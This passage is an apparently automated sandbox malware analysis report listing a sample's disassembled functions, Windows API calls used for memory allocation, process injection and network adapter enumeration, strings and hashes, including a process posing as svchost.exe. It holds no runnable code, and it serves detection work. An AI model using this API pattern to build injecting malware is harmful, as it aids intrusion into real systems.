Instruction ID: 4d70551202633f4cf27d5d93aec4b253003e6b1c8e1263e06443463bb6e67a25
Opcode Fuzzy Hash: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
Instruction Fuzzy Hash: 31E0C976A18780C6D710DF28E48074ABBB4F79A798FA04015EB8C82A28DB7DC155CF00

Function 100018C0 Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 100018EA

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
Instruction ID: 358533fb2e128c2901d80c4f4a4cfb589ac24ede55e7f2f42334dbb3c0a8b6ed
Opcode Fuzzy Hash: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
Instruction Fuzzy Hash: 44E0E5B2A24B858ADB01DF54E84078AB7A4F784798F801015E6CC83B28EB7DC25ACB40

Function 10001020 Relevance: 35.2, APIs: 2, Strings: 18, Instructions: 190libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(?,?,?,?,?,?,?,?,10001A56), ref: 1000110F
LdrLoadDll.NTDLL ref: 10001160

Strings

NtDuplicateObject, xrefs: 10001271
LdrGetProcedureAddress, xrefs: 100011D6
NtProtectVirtualMemory, xrefs: 100011B7
NtReadVirtualMemory, xrefs: 100011F5
NtFreeVirtualMemory, xrefs: 10001233
NtCreateEvent, xrefs: 10001252
kernelbase.dll, xrefs: 10001120
NtSignalAndWaitForSingleObject, xrefs: 1000128C
ntdll.dll, xrefs: 1000102D
NtClearEvent, xrefs: 100012C2
LdrLoadDll, xrefs: 10001083
kernel32.dll, xrefs: 100010C7
NtQueryInformationProcess, xrefs: 10001198
NtResumeThread, xrefs: 1000130C
NtClose, xrefs: 100012A7
MultiByteToWideChar, xrefs: 1000117C
NtAllocateVirtualMemory, xrefs: 10001214
NtWriteVirtualMemory, xrefs: 100012DD

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: Load
String ID: LdrGetProcedureAddress$LdrLoadDll$MultiByteToWideChar$NtAllocateVirtualMemory$NtClearEvent$NtClose$NtCreateEvent$NtDuplicateObject$NtFreeVirtualMemory$NtProtectVirtualMemory$NtQueryInformationProcess$NtReadVirtualMemory$NtResumeThread$NtSignalAndWaitForSingleObject$NtWriteVirtualMemory$kernel32.dll$kernelbase.dll$ntdll.dll
API String ID: 2234796835-2271829017
Opcode ID: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
Instruction ID: f45f7f1c08eb91b97991e6554cebb749e452b6f3a0b67de9b4da0f7efa5bb01d
Opcode Fuzzy Hash: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
Instruction Fuzzy Hash: AE7138B5201B4182EA06DB15B8513DA63E1FB887C4F86A439FA8D4732CEFBCD596C744

Function 006C01C0 Relevance: 3.1, APIs: 2, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 006C0201
VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 006C023A

Memory Dump Source

Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
Instruction ID: 894138f083ca20b9b9286852d9137461084fecc0a14fc348a54c43ee1eeb7d0e
Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
Instruction Fuzzy Hash: 6C118C72500210ABEB314E59CC48FBBB7AEEF85720B19451DFD1AE7204D625EE0586A1

Function 006B0000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 006B0065

Memory Dump Source

Source File: 00000007.00000002.2462697570.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_44qxnhoiecq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction ID: 067303ff40845fcfcc47d95c8eb743418814c3733953986777f947e425fb017e
Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction Fuzzy Hash: AE01D4B69403086BE7202F70CC04BCB3EAAAB88720F414519F98AA7281DD7899C08B58

Function 006C05BD Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,006C0093), ref: 006C05CA

Memory Dump Source

Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624

Non-executed Functions

Function 10001E70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 10001EA0
NtWriteVirtualMemory.NTDLL ref: 10001F06
NtSignalAndWaitForSingleObject.NTDLL ref: 10001F2D
NtReadVirtualMemory.NTDLL ref: 10001F63
NtSignalAndWaitForSingleObject.NTDLL ref: 10001F91
NtClose.NTDLL ref: 10001FC1
NtClose.NTDLL ref: 10001FCF

Strings

H, xrefs: 10001F10
H, xrefs: 10001EC7
H, xrefs: 10001F71

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$CloseObjectReadSignalSingleWait$Write
String ID: H$H$H
API String ID: 2084818639-1989617792
Opcode ID: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
Instruction ID: d3cf83964699c326543a64d7e9576905f73cd3ca186e7bac4399ed8c9f110ffe
Opcode Fuzzy Hash: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
Instruction Fuzzy Hash: 23412772604B8186EB60CF66F4907AE73A8FB89BC9F515126DE8D43A1CDF35C499CB40

Analysis Process: svchost.exePID: 5496, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	1827
Total number of Limit Nodes:	18

Executed Functions

Function 0000000140002900 Relevance: 41.3, APIs: 27, Instructions: 848memorycomthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E2B0: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000E2D4
Part of subcall function 000000014000E2B0: memset.MSVCRT ref: 000000014000E2F0
Part of subcall function 000000014000E2B0: LoadLibraryExW.KERNELBASE ref: 000000014000E36F
Part of subcall function 000000014000E2B0: GetProcAddress.KERNEL32 ref: 000000014000E3BB

SetCurrentDirectoryW.KERNELBASE ref: 0000000140002987
GetTickCount.KERNEL32 ref: 0000000140002994
srand.MSVCRT ref: 000000014000299D
CoInitializeEx.COMBASE ref: 00000001400029A7
CoInitializeSecurity.COMBASE ref: 00000001400029E2
CoCreateInstance.COMBASE ref: 0000000140002A4B
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B08
HeapFree.KERNEL32 ref: 0000000140002C08
HeapFree.KERNEL32 ref: 0000000140002C42
_time64.MSVCRT ref: 0000000140002C92
CreateThread.KERNELBASE ref: 0000000140002CC4
_time64.MSVCRT ref: 0000000140002D41
SleepEx.KERNELBASE ref: 0000000140002D88
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002E08

Part of subcall function 000000014000C3F0: LoadLibraryExW.KERNELBASE ref: 000000014000C46D
Part of subcall function 000000014000C3F0: LoadLibraryExW.KERNELBASE ref: 000000014000C4CD
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C500
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C533
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C566
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C599
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C5CC

HeapFree.KERNEL32 ref: 000000014000378D

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$??2@FreeHeapLibraryLoad$CreateInitialize_time64$CountCurrentDirectoryInstanceSecuritySleepThreadTickmemsetsrand
String ID:
API String ID: 3681577518-0
Opcode ID: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
Instruction ID: 68504463b67ef1b29f9b7d47820dd4a867066b0ffea43447dab23e93c07c9791
Opcode Fuzzy Hash: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
Instruction Fuzzy Hash: 7C923BB2604B8585EB62DF22E8503ED37A4F788BC8F444426EB4A57BB9DF39C945C740

Function 000000014000D0F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 197
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 000000014000D189
HeapFree.KERNEL32 ref: 000000014000D1A8
FindFirstFileW.KERNELBASE ref: 000000014000D28A
HeapFree.KERNEL32 ref: 000000014000D393
HeapFree.KERNEL32 ref: 000000014000D3C0
FindNextFileW.KERNELBASE ref: 000000014000D3DB
GetLastError.KERNEL32 ref: 000000014000D3E9

Strings

*.*, xrefs: 000000014000D226

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$FileFind$ErrorFirstLastNext
String ID: *.*
API String ID: 4099517661-438819550
Opcode ID: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
Instruction ID: 34dfc1c74ec25d379e75e5fc480104f8909db529063c5106447f390b2015c3b2
Opcode Fuzzy Hash: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
Instruction Fuzzy Hash: 46819DB1211B8582EB66CB13E5503EA73A5FB88BC0F445126EB8A577A9EF38C941C750

Function 000000014000A230 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 000000014000A262

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

GetAdaptersInfo.IPHLPAPI ref: 000000014000A294
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000000014000A3A0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000000014000A3B5

Strings

%02X, xrefs: 000000014000A349

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AdaptersAddressInfoLibraryLoadProc
String ID: %02X
API String ID: 3713241502-436463671
Opcode ID: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
Instruction ID: e87dbf364566d0340ffc93f2b35573667175a0268ae96110bc771c99fe9a3d48
Opcode Fuzzy Hash: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
Instruction Fuzzy Hash: 64413A72204B8583EB52DB26F4407DAA7E5F7897C4F048125FB8A47BA5EF38D846CB40

Function 0000000140006FB0 Relevance: 3.1, APIs: 2, Instructions: 99memoryencryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,?,00000020,00000000,00000001400072AD), ref: 0000000140007118

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

HeapFree.KERNEL32 ref: 00000001400070E8

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressContextCryptFreeHeapLibraryLoadProcRelease
String ID:
API String ID: 3850130045-0
Opcode ID: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
Instruction ID: 19954f6952f382fe07ad367a4b777b92ae69b62c1249c18f4d2fda55ef73c1ac
Opcode Fuzzy Hash: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
Instruction Fuzzy Hash: 4A413D7671178586EB61DF16E494BAA77A4F7C8B84F048126EF8D87764CF38C845CB40

Function 0000000140018168 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 0000000140018173

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
Instruction ID: b14e74fb3442ca454c0f05d9baab849c330a8665264c7a09ccb05e29302e0afa
Opcode Fuzzy Hash: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
Instruction Fuzzy Hash: 67B01271B51400D1D606AB23DCC23C012F4675C350FD00410D60D8A130DB3D83EFC700

Function 0000000140001080 Relevance: 54.4, APIs: 36, Instructions: 412
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001142
SysAllocString.OLEAUT32 ref: 0000000140001166
SysFreeString.OLEAUT32 ref: 00000001400011AD
??_V@YAXPEAX@Z.MSVCRT ref: 00000001400011BC
??3@YAXPEAX@Z.MSVCRT ref: 00000001400011C5
VariantInit.OLEAUT32 ref: 000000014000128D
VariantInit.OLEAUT32 ref: 00000001400012AF
SysAllocString.OLEAUT32 ref: 00000001400012DA
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001313
SysAllocString.OLEAUT32 ref: 000000014000133A
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001360
SysAllocString.OLEAUT32 ref: 0000000140001384
SysFreeString.OLEAUT32 ref: 0000000140001408
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001417
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001420
SysFreeString.OLEAUT32 ref: 000000014000143A
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001449
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001452
VariantClear.OLEAUT32 ref: 000000014000145D
VariantClear.OLEAUT32 ref: 0000000140001467
VariantClear.OLEAUT32 ref: 0000000140001471
VariantInit.OLEAUT32 ref: 00000001400014ED
VariantInit.OLEAUT32 ref: 0000000140001509
VariantInit.OLEAUT32 ref: 0000000140001525

Part of subcall function 0000000140001000: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000101A
Part of subcall function 0000000140001000: SysAllocString.OLEAUT32 ref: 000000014000103A

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001569
SysAllocString.OLEAUT32 ref: 000000014000158D
SysFreeString.OLEAUT32 ref: 0000000140001608
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001617
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001620
SysFreeString.OLEAUT32 ref: 0000000140001648
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001657
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001660
VariantClear.OLEAUT32 ref: 000000014000166F
VariantClear.OLEAUT32 ref: 0000000140001679
VariantClear.OLEAUT32 ref: 0000000140001683

Part of subcall function 000000014000CC50: GetCurrentProcess.KERNEL32 ref: 000000014000CC79
Part of subcall function 000000014000CC50: OpenProcessToken.ADVAPI32 ref: 000000014000CC8D
Part of subcall function 000000014000CC50: GetTokenInformation.KERNELBASE ref: 000000014000CCC3

HeapFree.KERNEL32 ref: 00000001400016E3

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: StringVariant$AllocClearFree$??2@??3@Init$ProcessToken$CurrentHeapInformationOpen
String ID:
API String ID: 932316019-0
Opcode ID: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
Instruction ID: 73fd58dbfa8de5e771e7542bc31443fe366ed4c037a12749888c4d0630df74ea
Opcode Fuzzy Hash: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
Instruction Fuzzy Hash: CE123F72601B8586EB26CF66E8503ED73B0FB98BC8F044115EF4A5BAA9DF79C645C340

Function 00000001400065D0 Relevance: 25.9, APIs: 17, Instructions: 363
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 0000000140006760
SysFreeString.OLEAUT32 ref: 0000000140006775
lstrcmpiW.KERNELBASE ref: 000000014000680B
_wtoi.MSVCRT ref: 0000000140006865
HeapFree.KERNEL32 ref: 00000001400068B9
HeapFree.KERNEL32 ref: 00000001400068D3
rand.MSVCRT ref: 00000001400068E0
HeapFree.KERNEL32 ref: 00000001400069E9
HeapFree.KERNEL32 ref: 0000000140006A08
HeapFree.KERNEL32 ref: 0000000140006A36
HeapFree.KERNEL32 ref: 0000000140006A58
SysFreeString.OLEAUT32 ref: 0000000140006A80
SysFreeString.OLEAUT32 ref: 0000000140006A90
HeapFree.KERNEL32 ref: 0000000140006AEC
HeapFree.KERNEL32 ref: 0000000140006B07
HeapFree.KERNEL32 ref: 0000000140006BA1
HeapFree.KERNEL32 ref: 0000000140006BBC

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoilstrcmpirand
String ID:
API String ID: 1050574015-0
Opcode ID: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
Instruction ID: 4a3659216eab84ee89323299ad5868aa41759a22a73ed70f653af329964e58fc
Opcode Fuzzy Hash: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
Instruction Fuzzy Hash: FFF16DB2304B8186EB62DF26E9403EA63A5F78DBC4F148015EB8E67B69DF39C545C701

Function 00000001400030F6 Relevance: 18.4, APIs: 12, Instructions: 410COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 0000000140003212

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _time64
String ID:
API String ID: 1670930206-0
Opcode ID: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
Instruction ID: 4b7130a5fe45b23e71bac91244d7ff03deac5bbb1559c1b7e8e26f4111e349c4
Opcode Fuzzy Hash: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
Instruction Fuzzy Hash: 50126FB2600B8185FB63DF66E8503ED27A4F748BC8F444426EB4A976B6DF39CA45C740

Function 0000000140003406 Relevance: 18.4, APIs: 12, Instructions: 392memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000344A
_time64.MSVCRT ref: 0000000140003452
_wtoi.MSVCRT ref: 0000000140003493
_wtoi.MSVCRT ref: 00000001400034B8

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _wtoi$FreeHeap_time64
String ID:
API String ID: 3473528173-0
Opcode ID: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
Instruction ID: 3e492c6d30ee683ac932d30f26eaa9c73d21aea8094979f73a7135df6a82422b
Opcode Fuzzy Hash: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
Instruction Fuzzy Hash: 2D026EB2600B8195FB62DF62E8503ED27A4F748BC8F444426EB4A976B9DF39C945C740

Function 00000001400031D6 Relevance: 18.4, APIs: 12, Instructions: 392COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 0000000140003212

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _time64
String ID:
API String ID: 1670930206-0
Opcode ID: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
Instruction ID: e20eebbb1c51daf8925e8ddc921a0e42dda1ff119c888ec2a9f7eee73c6ad8fd
